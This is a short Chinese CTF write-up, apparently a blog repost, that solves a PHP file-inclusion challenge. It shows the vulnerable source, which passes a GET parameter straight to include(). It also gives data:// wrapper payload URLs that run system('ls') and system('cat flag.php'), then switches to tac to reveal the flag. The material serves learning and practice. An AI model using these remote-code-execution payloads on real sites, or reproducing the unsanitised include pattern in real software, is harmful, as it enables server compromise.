首页 > Web开发 > 详细

Web_php_include文件包含

时间:2021-06-20 15:09:50      阅读:32      评论:0      收藏:0      [点我收藏+]

 

开始访问页面

技术分享图片

发现已经给出了php源码

下面我们查查他有哪些文件

http://xxx/?page=data://text/plain,<?php system("ls")?>

技术分享图片

发现有三个文件

一眼就能够看出flag肯定是我们需要查看的文件

接着查看它

http://xxxx3:9998/?page=data://text/plain,<?php system("cat flag.php")?>

技术分享图片

发现该页面没有什么变化

尝试将cat命令换成tac

发现flag出来了

$flag="key2:5Fvcs07N";

技术分享图片

 

 

 

下面是源码

<?php

show_source(__FILE__);

echo $_GET[‘hello‘];

$page=$_GET[‘page‘];

//while (strstr($page, "php://")) {

// $page=str_replace("php://", "", $page);

//}

include($page);

?>

 

Web_php_include文件包含

原文:https://www.cnblogs.com/liangshao666/p/14906427.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!